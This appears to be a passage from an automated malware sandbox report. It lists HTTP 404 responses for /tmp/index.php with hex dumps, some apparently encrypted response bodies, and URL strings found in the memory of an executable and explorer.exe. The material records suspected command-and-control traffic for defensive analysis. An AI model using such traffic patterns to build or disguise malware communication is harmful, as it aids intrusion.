          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 06 Jul 2024 04:16:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 06 Jul 2024 04:16:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 06 Jul 2024 04:16:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 ef d5 7f e5 7c Data Ascii: #\6U9H-anYp7vZW|
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 06 Jul 2024 04:16:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 06 Jul 2024 04:16:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 06 Jul 2024 04:16:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 06 Jul 2024 04:16:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 06 Jul 2024 04:16:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 06 Jul 2024 04:16:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 06 Jul 2024 04:16:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 06 Jul 2024 04:16:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2e 5c 24 14 a6 69 44 aa ad 10 bd cf b4 f9 6d 87 37 c6 ec 26 57 11 c2 8f 97 cb Data Ascii: #\.\$iDm7&W
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 06 Jul 2024 04:17:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 06 Jul 2024 04:17:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 06 Jul 2024 04:17:08 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 08 6e 48 ba 3c 03 e8 fb 48 e1 9a e3 ba 32 da 2d da f5 6c 5b 01 98 8b 8c c6 69 d1 30 01 00 d0 53 d8 0c 35 00 0d e4 cc 26 a7 2f f0 12 50 4f 23 75 4c cd 7c b8 74 4b e1 91 2d 33 9c 67 dd f0 e3 67 21 cd 1c e9 0b 97 a7 79 04 1d 7e 8f 1f e2 b7 c9 49 d3 93 29 75 73 e9 fa bc c5 e5 81 cf 25 a5 46 5c ac dc 98 fe 0e 01 61 42 fd 82 f5 09 e8 96 75 3a 96 2a 91 a8 4a bc aa 03 a4 41 d8 1a 48 e3 6b 93 77 2d 84 0a ff 06 61 8f 02 12 bd c8 90 5c 17 ef 38 6f f6 09 c5 1a 87 8c 73 22 6f c1 33 1c 45 09 fa f8 71 af 55 ac 31 0f c3 c8 8f 55 6a 05 Data Ascii: #\6nH<H2-l[i0S5&/PO#uL|tK-3gg!y~I)us%F\aBu:*JAHkw-a\8os"o3EqU1Uj
          Source: 8FDD.exe, 00000006.00000003.2141664846.0000000003D0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: 8FDD.exe, 00000006.00000003.2141664846.0000000003D0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: explorer.exe, 00000001.00000000.1709654880.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1710883230.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2870375975.0000000008D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 0000000B.00000003.2511610475.000000000908F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
          Source: 8FDD.exe, 00000006.00000003.2141664846.0000000003D0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
          Source: 8FDD.exe, 00000006.00000003.2141664846.0000000003D0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: 8FDD.exe, 00000006.00000003.2141664846.0000000003D0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: explorer.exe, 00000001.00000000.1709654880.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1710883230.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2870375975.0000000008D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: 8FDD.exe, 00000006.00000003.2141664846.0000000003D0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
          Source: explorer.exe, 00000001.00000000.1709654880.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1710883230.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2870375975.0000000008D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: 8FDD.exe, 00000006.00000003.2141664846.0000000003D0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
          Source: explorer.exe, 00000001.00000000.1709654880.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1710883230.000000000982D000.00000004.00000001.00020000.00000000.sdmp, 8FDD.exe, 00000006.00000003.2141664846.0000000003D0F000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2870375975.0000000008D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000001.00000000.1709654880.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: 8FDD.exe, 00000006.00000003.2141664846.0000000003D0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
          Source: explorer.exe, 00000001.00000000.1713660938.000000000CA42000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
          Source: explorer.exe, 00000001.00000000.1713660938.000000000CA42000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
          Source: explorer.exe, 00000001.00000000.1710540741.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1710223246.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1711676695.0000000009B60000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: 8FDD.exe, 00000006.00000003.2141664846.0000000003D0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
          Source: 8FDD.exe, 00000006.00000003.2141664846.0000000003D0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
